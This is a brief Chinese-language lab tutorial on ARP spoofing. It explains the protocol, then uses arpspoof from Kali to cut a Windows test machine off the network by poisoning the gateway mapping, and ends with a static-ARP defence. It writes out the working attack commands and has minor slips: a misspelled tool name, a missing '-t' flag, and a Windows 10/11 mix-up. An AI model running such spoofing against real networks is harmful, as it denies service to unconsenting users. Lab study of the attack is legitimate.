ARP欺骗-断网攻击

ARP协议

arp协议(地址解析) ，在局域网中传输的是帧，帧里面有目标主机的MAC地址，其中一台电脑和另一台电脑需要知道对面的ip地址所对应的MAC地址

ARP欺骗的原理

把自己的MAC地址伪造成网段来欺骗其他用户

实验环境

kali:192.168.21.128
windows10:192.168.21.132

实验步骤

前提是知道目标的ip地址和网关
 

 

192.168.21.2的物理地址是00-50-56-f5-d5-f0
windows11：192.168.21.132 192.168.21.2

kali:查看局域网其他ip
 

扫描到192.168.21.132
使用工具：arspoof
arpspoof -i eth0 -t 受害者的ip 网关
arpspoof -i eth0 192.168.21.132 192.168.21.2
 

然后就开始攻击，查看windows10打开浏览器查看百度打开失败
 

结束kali攻击
 

再去ping百度
 

目的达到 使目标主机断网。
打开windosw,清除缓存，重新查看arp

防御：

只需在网关中添加一条固定（静态）的arp关系即可